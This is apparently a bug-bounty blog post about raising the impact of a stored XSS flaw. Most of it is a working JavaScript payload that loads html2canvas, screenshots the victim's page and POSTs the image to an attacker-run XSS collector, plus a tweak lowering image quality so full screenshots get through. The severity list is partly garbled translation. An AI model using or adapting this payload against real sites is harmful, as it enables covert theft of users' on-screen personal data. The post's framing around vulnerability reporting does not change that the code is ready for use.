layout: post
title: 12. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS
Preface
This record is the 12th short article that records the actual src process, and the content is the xssbypass of a website.
Touch typing storage xss
Generally, storing xss will encounter two situations:
- If it can be accessed from the public network, the hazard is determined based on the sensitivity of the background, and generally it can reach a high risk.
- It is not possible to access the public network. If you hit the cookie, if the harm is not proven, it will generally be in danger.
- Wormable user xss, high risk
- Ordinary user-level storage xss that is not worm-free, medium-risk
Ways to raise the hazard
For the second case, the conceivable way to increase the damage is to take screenshots of xss.
document.write("<script src=\"https:\/\/xxxxx\/html2canvas.js\"><\/script>");
window.onload = function () {
html2canvas(document.body, {
onrendered: function (canvas) {
//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post
xhr = function () {
var request = false;
if (window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if (window.ActiveXObject) {
try {
request = new window.ActiveXObject('Microsoft.XMLHTTP');
} catch (e) {
}
}
return request;
}();
request = function (method, src, argv, content_type) {
xhr.open(method, src, false);
if (method == 'POST') xhr.setRequestHeader('Content-type', content_type);
xhr.send(argv); //发送POST数据
return xhr.responseText;
};
attack_a = function () {
var src = "https://xxxx/xss.php?do=api&id={projectId}"; //post接收地址
var argv_0 = "'&screenshot=" + canvas.toDataURL(); //post字段名称为screenshot
request("POST", src, argv_0, "application/x-www-form-urlencoded");
};
attack_a();
}
});
}
However, the problem encountered by this platform is that sometimes the image data is too large and there will be less data when converted to base64.
At this time, the complete picture can be transmitted by reducing pixel transmission.
Solution
var fullQuality = canvas.toDataURL("image/jpeg", 1.0);
// data:image/jpeg;base64,/9j/4AAQSkZJRgABAQ...9oADAMBAAIRAxEAPwD/AD/6AP/Z"
var mediumQuality = canvas.toDataURL("image/jpeg", 0.5);
var lowQuality = canvas.toDataURL("image/jpeg", 0.1);
In the final effect, you can still see the user's data clearly.
Afterword
xxxxx